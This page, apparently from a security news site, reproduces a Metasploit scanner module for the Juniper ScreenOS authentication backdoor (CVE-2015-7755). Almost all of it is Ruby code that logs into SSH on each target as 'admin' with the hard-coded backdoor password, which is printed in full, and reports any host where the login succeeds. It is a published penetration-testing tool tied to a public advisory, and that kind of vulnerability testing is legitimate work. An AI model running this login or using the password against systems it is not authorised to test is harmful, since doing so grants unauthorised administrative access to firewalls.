Security
Headlines
HeadlinesLatestCVEs

Headline

Juniper SSH Backdoor Scanner

This Metasploit module scans for the Juniper SSH backdoor (also valid on Telnet). Any username is required, and the password is <<< %s(un=%s) = %u.

Packet Storm
#js#git#backdoor#auth#ssh#telnet
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/ssh'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::SSH  def initialize(info = {})    super(update_info(info,      'Name'           => 'Juniper SSH Backdoor Scanner',      'Description'    => %q{        This module scans for the Juniper SSH backdoor (also valid on Telnet).        Any username is required, and the password is <<< %s(un='%s') = %u.      },      'Author'         => [        'hdm',                               # Discovery        'h00die <mike[at]stcyrsecurity.com>' # Module      ],      'References'     => [        ['CVE', '2015-7755'],        ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],        ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']      ],      'DisclosureDate' => '2015-12-20',      'License'        => MSF_LICENSE    ))    register_options([      Opt::RPORT(22)    ])    register_advanced_options([      OptBool.new('SSH_DEBUG',  [false, 'SSH debugging', false]),      OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])    ])  end  def run_host(ip)    ssh_opts = ssh_client_defaults.merge({      :port            => rport,      :auth_methods    => ['password', 'keyboard-interactive'],      :password        => %q{<<< %s(un='%s') = %u},    })    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(          ip,          'admin',          ssh_opts        )      end    rescue Net::SSH::Exception => e      vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")      return    end    if ssh      print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")      report_vuln(        :host => ip,        :name => self.name,        :refs => self.references,        :info => ssh.transport.server_version.version      )    end  end  def rport    datastore['RPORT']  endend

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution